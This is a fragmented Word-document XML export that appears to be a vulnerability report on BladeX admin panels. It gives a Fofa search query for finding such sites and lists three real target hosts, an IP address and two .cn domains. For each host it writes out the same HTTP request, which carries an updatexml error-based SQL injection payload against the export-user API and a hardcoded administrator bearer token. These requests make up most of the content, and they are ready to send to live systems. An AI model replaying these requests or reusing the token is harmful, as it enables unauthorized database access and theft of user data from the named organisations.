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Fofa:body="https://bladex.vip/"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787140"/>
            <wp:effectExtent l="0" t="0" r="952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"https://8.130.15.14/#/login"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https://8.130.15.14/#/login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5273040" cy="3629660"/>
            <wp:effectExtent l="0" t="0" r="1016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GET /api/blade-user/export-user?account=&amp;realName=&amp;1-updatexml(1,concat(0x5c,md5(619023),0x5c),1)=1 HTTP/2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Host: 8.130.15.14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(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36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Accept-Encoding: gzip, deflate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Accept: */*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Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ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150" cy="274447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629660"/>
            <wp:effectExtent l="0" t="0" r="1016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"https://oral-admin-dev.ynlky.cn/#/login"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https://oral-admin-dev.ynlky.cn/#/login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71770" cy="3064510"/>
            <wp:effectExtent l="0" t="0" r="1143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GET /api/blade-user/export-user?account=&amp;realName=&amp;1-updatexml(1,concat(0x5c,md5(619023),0x5c),1)=1 HTTP/2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Host: oral-admin-dev.ynlky.cn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(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36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Accept-Encoding: gzip, deflate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Accept: */*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Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ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2405" cy="2740660"/>
            <wp:effectExtent l="0" t="0" r="1079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1748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资产三:https://test.shsrst.cn/#/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="3115945"/>
            <wp:effectExtent l="0" t="0" r="635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GET /api/blade-user/export-user?account=&amp;realName=&amp;1-updatexml(1,concat(0x5c,md5(619023),0x5c),1)=1 HTTP/2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Host: test.shsrst.cn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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36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Accept-Encoding: gzip, deflate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Accept: */*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Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ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4310" cy="2862580"/>
            <wp:effectExtent l="0" t="0" r="889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753360"/>
            <wp:effectExtent l="0" t="0" r="1079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7252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2024-03-31T07:04:59Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-31T07:33:12Z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3D80F06C68374140BB9D7B3C90844C31_12</vt:lpwstr>
  </property>
</Properties>
</file>